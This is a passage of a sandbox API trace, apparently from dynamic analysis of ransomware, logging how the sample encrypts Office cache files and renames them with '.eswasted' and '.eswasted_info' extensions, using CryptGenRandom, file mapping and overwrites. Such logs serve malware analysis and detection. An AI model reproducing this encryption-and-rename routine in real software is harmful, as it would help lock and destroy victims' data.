dwNumberOfBytesToMap=0x251f) returned 0x2d0000 [0070.667] CloseHandle (hObject=0x120) returned 1 [0070.670] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.670] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e0a38 | out: pbBuffer=0x4e0a38) returned 1 [0070.670] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.670] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.671] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.671] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.679] SetEndOfFile (hFile=0x110) returned 1 [0070.686] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec6b0 | out: hHeap=0x4a0000) returned 1 [0070.687] CloseHandle (hObject=0x110) returned 1 [0070.688] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.688] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1800 | out: hHeap=0x4a0000) returned 1 [0070.688] _aulldvrm () returned 0x0 [0070.688] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.689] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.689] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.689] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 81 [0070.689] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4ddd20 [0070.689] lstrcpyW (in: lpString1=0x4dddc2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.689] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.689] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.690] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.690] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.690] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.691] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.692] SetEndOfFile (hFile=0x110) returned 1 [0070.692] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.692] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.692] lstrcpyW (in: lpString1=0x4dddc2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted")) returned 1 [0070.693] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.693] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.693] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x646 [0070.693] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x646) returned 0x2d0000 [0070.693] CloseHandle (hObject=0x118) returned 1 [0070.698] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.699] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e0a38 | out: pbBuffer=0x4e0a38) returned 1 [0070.699] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.699] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.699] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.699] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.708] SetEndOfFile (hFile=0x110) returned 1 [0070.710] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.710] CloseHandle (hObject=0x110) returned 1 [0070.711] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.711] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e18f8 | out: hHeap=0x4a0000) returned 1 [0070.711] _aulldvrm () returned 0x0 [0070.711] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.712] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.712] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.712] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4ddd20 [0070.712] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.712] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.712] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.713] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.713] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.713] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.713] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.714] SetEndOfFile (hFile=0x110) returned 1 [0070.714] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.714] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.714] lstrcpyW (in: lpString1=0x4dddb8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.716] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.716] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.716] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x7c4 [0070.716] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7c4) returned 0x2d0000 [0070.716] CloseHandle (hObject=0x120) returned 1 [0070.719] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.720] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1810 | out: pbBuffer=0x4e1810) returned 1 [0070.720] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.720] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.721] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.721] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.729] SetEndOfFile (hFile=0x110) returned 1 [0070.732] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.732] CloseHandle (hObject=0x110) returned 1 [0070.733] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddd20 | out: hHeap=0x4a0000) returned 1 [0070.733] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e19f8 | out: hHeap=0x4a0000) returned 1 [0070.733] _aulldvrm () returned 0x0 [0070.733] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.734] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.734] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.734] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned 81 [0070.734] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ac) returned 0x4f5f48 [0070.735] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.735] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e09f0 [0070.735] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.735] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e09f0 | out: pbBuffer=0x4e09f0) returned 1 [0070.735] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.735] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.737] WriteFile (in: hFile=0x110, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.737] SetEndOfFile (hFile=0x110) returned 1 [0070.738] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.738] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0070.738] lstrcpyW (in: lpString1=0x4f5fea, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted")) returned 1 [0070.741] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.742] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.742] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5ac [0070.742] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x2d0000 [0070.742] CloseHandle (hObject=0x118) returned 1 [0070.745] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.746] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e0c90 | out: pbBuffer=0x4e0c90) returned 1 [0070.746] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.746] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.746] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.747] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.755] SetEndOfFile (hFile=0x110) returned 1 [0070.757] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.757] CloseHandle (hObject=0x110) returned 1 [0070.761] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0070.761] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1af0 | out: hHeap=0x4a0000) returned 1 [0070.761] _aulldvrm () returned 0x0 [0070.761] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.762] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.762] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.762] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.762] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e0f00 [0070.762] lstrcpyW (in: lpString1=0x4e0f98, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.762] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.762] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.763] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.763] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.763] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.763] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.764] SetEndOfFile (hFile=0x110) returned 1 [0070.764] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.764] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.764] lstrcpyW (in: lpString1=0x4e0f98, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.765] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.765] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0070.765] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x750 [0070.765] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x750) returned 0x2d0000 [0070.765] CloseHandle (hObject=0x120) returned 1 [0070.767] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.768] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e11f8 | out: pbBuffer=0x4e11f8) returned 1 [0070.768] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.768] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.769] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.769] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.777] SetEndOfFile (hFile=0x110) returned 1 [0070.779] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.779] CloseHandle (hObject=0x110) returned 1 [0070.780] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e0f00 | out: hHeap=0x4a0000) returned 1 [0070.781] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1bf0 | out: hHeap=0x4a0000) returned 1 [0070.781] _aulldvrm () returned 0x0 [0070.781] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.781] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.781] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.781] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0070.781] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f5f48 [0070.782] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.782] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.782] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.782] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.782] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.782] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.783] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.784] SetEndOfFile (hFile=0x110) returned 1 [0070.784] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.784] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.784] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.785] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted")) returned 1 [0070.786] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0070.786] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.786] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x391 [0070.786] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x391) returned 0x2d0000 [0070.786] CloseHandle (hObject=0x118) returned 1 [0070.788] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.789] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1b00 | out: pbBuffer=0x4e1b00) returned 1 [0070.789] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.789] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.790] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.790] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 